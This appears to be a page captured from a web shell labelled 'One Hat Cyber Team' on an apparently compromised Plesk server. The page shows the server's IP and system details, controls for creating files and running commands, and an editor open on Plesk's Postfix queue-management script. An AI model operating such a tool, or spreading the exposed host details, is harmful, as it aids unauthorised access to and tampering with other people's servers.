⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.72
Server IP:
41.128.143.86
Server:
Linux host.raqmix.cloud 6.8.0-1025-azure #30~22.04.1-Ubuntu SMP Wed Mar 12 15:28:20 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
8.3.23
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
local
/
psa
/
admin
/
sbin
/
modules
/
log-browser
/
Edit File: postqueue
#!/usr/bin/env bash # Copyright 1999-2024. WebPros International GmbH. All rights reserved. main() { local command="${1:?"Command must be specified as the first parameter"}" case "$command" in get-queue) postqueue -j exit $? ;; get-message-headers-batch) shift if [[ -z "$1" ]]; then echo "At least one queue ID must be specified" >&2 exit 1 fi while [[ -n "$1" ]]; do echo "$1 $(postcat -qh "$1" | base64 -w0)" shift done ;; delete-message) local id="${2:?"Queue ID must be specified as the second parameter"}" postsuper -d "$id" exit $? ;; flush-message) local id="${2:?"Queue ID must be specified as the second parameter"}" postqueue -i "$id" exit $? ;; purge-all-queues) postsuper -d ALL exit $? ;; *) echo "Unknown command: ${command}" >&2 exit 1 ;; esac } main "$@"
Simpan